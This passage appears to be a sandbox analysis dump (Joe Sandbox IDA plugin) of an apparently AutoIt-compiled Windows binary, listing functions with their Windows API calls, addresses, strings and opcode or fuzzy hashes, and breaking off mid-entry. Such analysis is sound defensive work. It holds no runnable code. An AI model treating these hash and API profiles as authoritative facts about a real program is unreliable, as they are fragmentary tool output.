        • API String ID: 469580280-3243417748
        • Opcode ID: 512f3fe0bb164c7c356d6a0e46235e5dccceda885596f04353fc139a9b435c4f
        • Instruction ID: 181f6d3e95246d14e7bd016461c79d6583668ac9cb8e6a5e4431250c1d562ed9
        • Opcode Fuzzy Hash: 512f3fe0bb164c7c356d6a0e46235e5dccceda885596f04353fc139a9b435c4f
        • Instruction Fuzzy Hash: 52D1DF31711662EFCB28EF55D498B2DF7A4BF05700F61819DE90A6B252CB31AD26CF50
        APIs
        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00257FAD
        • SetCurrentDirectoryW.KERNEL32(?), ref: 00257FC1
        • GetFileAttributesW.KERNEL32(?), ref: 00257FEB
        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00258005
        • SetCurrentDirectoryW.KERNEL32(?), ref: 00258017
        • SetCurrentDirectoryW.KERNEL32(?), ref: 00258060
        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002580B0
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CurrentDirectory$AttributesFile
        • String ID: *.*
        • API String ID: 769691225-438819550
        • Opcode ID: 0b8f9c1f0f9b15d01117f3295b2ce5e5294fb7e23387cf17ce166e81d1a8ad80
        • Instruction ID: 5e749161f4fd989fbfbbce6dae75540c6277d4fca4dd230e7451e241c141e584
        • Opcode Fuzzy Hash: 0b8f9c1f0f9b15d01117f3295b2ce5e5294fb7e23387cf17ce166e81d1a8ad80
        • Instruction Fuzzy Hash: 3381F0715283429BCB20EF14D8459AEB3E8BF88311F14486EFC85D7250EB70DD59CB96
        APIs
        • SetWindowLongW.USER32(?,000000EB), ref: 001E5C7A
          • Part of subcall function 001E5D0A: GetClientRect.USER32(?,?), ref: 001E5D30
          • Part of subcall function 001E5D0A: GetWindowRect.USER32(?,?), ref: 001E5D71
          • Part of subcall function 001E5D0A: ScreenToClient.USER32(?,?), ref: 001E5D99
        • GetDC.USER32 ref: 002246F5
        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00224708
        • SelectObject.GDI32(00000000,00000000), ref: 00224716
        • SelectObject.GDI32(00000000,00000000), ref: 0022472B
        • ReleaseDC.USER32(?,00000000), ref: 00224733
        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002247C4
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
        • String ID: U
        • API String ID: 4009187628-3372436214
        • Opcode ID: 2e97f8e11cd7baa5e1808144bba4f74c34d92c7394ab1ce786f83a8a256eb3ae
        • Instruction ID: 8d0bfd40736927108e5d2edb3a659d51d051ced7c38d1486b3f8c750cfdd6c7c
        • Opcode Fuzzy Hash: 2e97f8e11cd7baa5e1808144bba4f74c34d92c7394ab1ce786f83a8a256eb3ae
        • Instruction Fuzzy Hash: 21711530410606EFCF259FA4E984AFA7BBAFF4A314F244269ED655A166C3319CA1CF50
        APIs
        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002535E4
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
        • LoadStringW.USER32(002B2390,?,00000FFF,?), ref: 0025360A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: LoadString$_wcslen
        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
        • API String ID: 4099089115-2391861430
        • Opcode ID: 4a1980aa4b774f3f4e7d1e130bb4af6f0ff98df6ed8f61d5c4f2c279adb2809e
        • Instruction ID: 178ebfbd64bbe893dd3754c20d8b13fd451a79001d46bea0859feb93dc1d7556
        • Opcode Fuzzy Hash: 4a1980aa4b774f3f4e7d1e130bb4af6f0ff98df6ed8f61d5c4f2c279adb2809e
        • Instruction Fuzzy Hash: B0519071C1064ABBCF15EBA1DC46EEEBB78EF24341F544125F505720A2EB301AA9DF64
        APIs
        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0025C272
        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0025C29A
        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0025C2CA
        • GetLastError.KERNEL32 ref: 0025C322
        • SetEvent.KERNEL32(?), ref: 0025C336
        • InternetCloseHandle.WININET(00000000), ref: 0025C341
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
        • String ID:
        • API String ID: 3113390036-3916222277
        • Opcode ID: 16125e13a1d83247313befead0660b9ac60cdfcc038d0c75cb6e83bd773ef3b4
        • Instruction ID: d8c608e750e2934d2c41f837e2bed63f00731ff5d87d4e1d0a6439b8471f3779
        • Opcode Fuzzy Hash: 16125e13a1d83247313befead0660b9ac60cdfcc038d0c75cb6e83bd773ef3b4
        • Instruction Fuzzy Hash: B0319171520308BFD7219F64DC88A6B7BFCEB49741F20855EF846D2201EB70DD588B64
        APIs
        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00223AAF,?,?,Bad directive syntax error,0027CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 002498BC
        • LoadStringW.USER32(00000000,?,00223AAF,?), ref: 002498C3
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00249987
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: HandleLoadMessageModuleString_wcslen
        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
        • API String ID: 858772685-4153970271
        • Opcode ID: 34351ff9ac0195dce3f1075b61a8511449a92d450f2fa27d5a1e9b9179ff1239
        • Instruction ID: be05a081cd8dfbcf5ca35c15b58198cdc890c35e00ea16136918f9fee6668054
        • Opcode Fuzzy Hash: 34351ff9ac0195dce3f1075b61a8511449a92d450f2fa27d5a1e9b9179ff1239
        • Instruction Fuzzy Hash: FD217431C1025EBBCF15AF90DC0AEEE7775FF29700F044459F515660A1EB719A68DB50
        APIs
        • GetParent.USER32 ref: 002420AB
        • GetClassNameW.USER32(00000000,?,00000100), ref: 002420C0
        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0024214D
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: ClassMessageNameParentSend
        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
        • API String ID: 1290815626-3381328864
        • Opcode ID: c4b899c5a416d09a8b401efb04a5449947c23a8a26b454395dc34d44e06bfe2d
        • Instruction ID: 44a0f58a795f4544605284f1188fb7fe9dc03402c7f3ae1e7bf02cfd42ad99eb
        • Opcode Fuzzy Hash: c4b899c5a416d09a8b401efb04a5449947c23a8a26b454395dc34d44e06bfe2d
        • Instruction Fuzzy Hash: BF1127762B8317FAF7093625AC0BDA7339CCB06325B70001AFB0CA40D3EEA558755A24
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
        • String ID:
        • API String ID: 1282221369-0
        • Opcode ID: 86c3a0f5443440df310f30df7a8d5f4f05379c8e27a444da52e06e8ae3d50c87
        • Instruction ID: a580376edef49e3db45ac5a0dd72e60b94f44b2abadedd6c9039ac98f0d9c8b9
        • Opcode Fuzzy Hash: 86c3a0f5443440df310f30df7a8d5f4f05379c8e27a444da52e06e8ae3d50c87
        • Instruction Fuzzy Hash: 7661AD75964306EFDB21AFB49885AEA7BD5EF25320F24016EF80497281D7319CF2CB90
        APIs
        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00236890
        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002368A9
        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002368B9
        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 002368D1
        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002368F2
        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001F8874,00000000,00000000,00000000,000000FF,00000000), ref: 00236901
        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0023691E
        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001F8874,00000000,00000000,00000000,000000FF,00000000), ref: 0023692D
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Icon$DestroyExtractImageLoadMessageSend
        • String ID:
        • API String ID: 1268354404-0
        • Opcode ID: 2ca86a3a1ff3d8d47cf7974533506d9cc7943f3b5e140c28202a6dd264181410
        • Instruction ID: 6dc1dcc11b6cfbe9e6d2cc7849549409319c694ea567ef7a3f57d5d491bac7da
        • Opcode Fuzzy Hash: 2ca86a3a1ff3d8d47cf7974533506d9cc7943f3b5e140c28202a6dd264181410
        • Instruction Fuzzy Hash: C451AAB0610209EFDB24CF24DC99FAA7BB9FB58350F104518FA16972A0DB70E9A0CB50
        APIs
        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0025C182
        • GetLastError.KERNEL32 ref: 0025C195
        • SetEvent.KERNEL32(?), ref: 0025C1A9
          • Part of subcall function 0025C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0025C272
          • Part of subcall function 0025C253: GetLastError.KERNEL32 ref: 0025C322
          • Part of subcall function 0025C253: SetEvent.KERNEL32(?), ref: 0025C336
          • Part of subcall function 0025C253: InternetCloseHandle.WININET(00000000), ref: 0025C341
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
        • String ID:
        • API String ID: 337547030-0
        • Opcode ID: 908599b0d8384ac00e709fd7c0eb57b047cdc55383ba0ec1c3679001398ca352
        • Instruction ID: 0a9b2dd0f658427c21628810e7adffca8da6f2f7cd99aeea8200d9cffa76a3cb
        • Opcode Fuzzy Hash: 908599b0d8384ac00e709fd7c0eb57b047cdc55383ba0ec1c3679001398ca352
        • Instruction Fuzzy Hash: 51317071110701AFDB219FB5EC48A66BBE9FF58302F20441DFD5AC6611E730E8689F64
        APIs
          • Part of subcall function 00243A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00243A57
          • Part of subcall function 00243A3D: GetCurrentThreadId.KERNEL32 ref: 00243A5E
          • Part of subcall function 00243A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002425B3), ref: 00243A65
        • MapVirtualKeyW.USER32(00000025,00000000), ref: 002425BD
        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002425DB
        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 002425DF
        • MapVirtualKeyW.USER32(00000025,00000000), ref: 002425E9
        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00242601
        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00242605
        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0024260F
        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00242623
        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00242627
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
        • String ID:
        • API String ID: 2014098862-0
        • Opcode ID: b49dd50b3d814508542e15f139cbf945f3be86df5e12fe0bef3cccd6e8b216dc
        • Instruction ID: 9839f308120210b922dc4b384c5ea4b52f7f35ed5033ea7af61dc35255f4f01d
        • Opcode Fuzzy Hash: b49dd50b3d814508542e15f139cbf945f3be86df5e12fe0bef3cccd6e8b216dc
        • Instruction Fuzzy Hash: 3201B530790220BBFB1467799C8EF593E59DB4AB11F600015F31CAE0D1C9E11494CA69
        APIs
        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00241449,?,?,00000000), ref: 0024180C
        • HeapAlloc.KERNEL32(00000000,?,00241449,?,?,00000000), ref: 00241813
        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00241449,?,?,00000000), ref: 00241828
        • GetCurrentProcess.KERNEL32(?,00000000,?,00241449,?,?,00000000), ref: 00241830
        • DuplicateHandle.KERNEL32(00000000,?,00241449,?,?,00000000), ref: 00241833
        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00241449,?,?,00000000), ref: 00241843
        • GetCurrentProcess.KERNEL32(00241449,00000000,?,00241449,?,?,00000000), ref: 0024184B
        • DuplicateHandle.KERNEL32(00000000,?,00241449,?,?,00000000), ref: 0024184E
        • CreateThread.KERNEL32(00000000,00000000,00241874,00000000,00000000,00000000), ref: 00241868
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
        • String ID:
        • API String ID: 1957940570-0
        • Opcode ID: 8e188573c156dd044bc901a4f00057ef797ec20cda161ac40b38b82e33c1dbda
        • Instruction ID: 88217dd1e7b893645a131e485d1e395d9ec27f9e34bc3482b03388acbd3a0e4f
        • Opcode Fuzzy Hash: 8e188573c156dd044bc901a4f00057ef797ec20cda161ac40b38b82e33c1dbda
        • Instruction Fuzzy Hash: 4D01CDB5240308BFE710AFB5EC4DF6B3BACEB89B11F504425FA09DB1A1CA709850CB20
        APIs
          • Part of subcall function 0024D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0024D501
          • Part of subcall function 0024D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0024D50F
          • Part of subcall function 0024D4DC: CloseHandle.KERNEL32(00000000), ref: 0024D5DC
        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0026A16D
        • GetLastError.KERNEL32 ref: 0026A180
        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0026A1B3
        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0026A268
        • GetLastError.KERNEL32(00000000), ref: 0026A273
        • CloseHandle.KERNEL32(00000000), ref: 0026A2C4
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
        • String ID: SeDebugPrivilege
        • API String ID: 2533919879-2896544425
        • Opcode ID: 5de71bbdfb6f9b996aa80d7bfa039219b2320e088961c381aaec63f7b8f3b886
        • Instruction ID: e198b9c13ae7cba60d54aeaff038475297127c0e722ec39ce6395fc8bf4bc01e
        • Opcode Fuzzy Hash: 5de71bbdfb6f9b996aa80d7bfa039219b2320e088961c381aaec63f7b8f3b886
        • Instruction Fuzzy Hash: 8461C0302146429FD320DF19C894F1ABBE1AF54318F54849CE86A9B7A3C772EC95CF92
        APIs
        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00273925
        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0027393A
        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00273954
        • _wcslen.LIBCMT ref: 00273999
        • SendMessageW.USER32(?,00001057,00000000,?), ref: 002739C6
        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002739F4
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend$Window_wcslen
        • String ID: SysListView32
        • API String ID: 2147712094-78025650
        • Opcode ID: 401f2acc16eb9076813f2529f4f5e966adeb52e2fe9bfd032119df9b351e0177
        • Instruction ID: 10b4c2565f7fd9c5a639897a1331d6bbd48e73924e3dbbcdef6c4526e23569db
        • Opcode Fuzzy Hash: 401f2acc16eb9076813f2529f4f5e966adeb52e2fe9bfd032119df9b351e0177
        • Instruction Fuzzy Hash: B541C371A10319ABEB21DF64CC49BEA77A9EF08350F10452AF95CE7281D7719AA0DB90
        APIs
        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0024BCFD
        • IsMenu.USER32(00000000), ref: 0024BD1D
        • CreatePopupMenu.USER32 ref: 0024BD53
        • GetMenuItemCount.USER32(01055730), ref: 0024BDA4
        • InsertMenuItemW.USER32(01055730,?,00000001,00000030), ref: 0024BDCC
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Menu$Item$CountCreateInfoInsertPopup
        • String ID: 0$2
        • API String ID: 93392585-3793063076
        • Opcode ID: 0ba5932a2279607ecd6498d7a41402084470404666967934f9552265a6f1e476
        • Instruction ID: 24e40077cf65eed0e827e1f88fab5715ba9a72170a7d2b25e1e1fcc5ff970c47
        • Opcode Fuzzy Hash: 0ba5932a2279607ecd6498d7a41402084470404666967934f9552265a6f1e476
        • Instruction Fuzzy Hash: 6551BF70E20206DBDF2ACFB8D8C8BAEBBF4AF45314F244199E411A7290D7B0D965CB51
        APIs
        • _ValidateLocalCookies.LIBCMT ref: 00202D4B
        • ___except_validate_context_record.LIBVCRUNTIME ref: 00202D53
        • _ValidateLocalCookies.LIBCMT ref: 00202DE1
        • __IsNonwritableInCurrentImage.LIBCMT ref: 00202E0C
        • _ValidateLocalCookies.LIBCMT ref: 00202E61
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
        • String ID: &H $csm
        • API String ID: 1170836740-2339039177
        • Opcode ID: bf18ee05b2952543d94ee46e2cd267cfe120e47b583d965446ce63f82e19742a
        • Instruction ID: dbc6b1a402f65f4694786cc9ee216ef2a3f8139ce25cb6dc5bf85e0ca253bff8
        • Opcode Fuzzy Hash: bf18ee05b2952543d94ee46e2cd267cfe120e47b583d965446ce63f82e19742a
        • Instruction Fuzzy Hash: 49415434A20309EBCF10DF68C859A9EBBB5AF45314F148156E8146B3D3D771AE29CB90
        APIs
        • LoadIconW.USER32(00000000,00007F03), ref: 0024C913
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: IconLoad
        • String ID: blank$info$question$stop$warning
        • API String ID: 2457776203-404129466
        • Opcode ID: c9eaacec733ffca64cd2c339f12f58a4d14f5543427422c38d9f6ee2549249d5
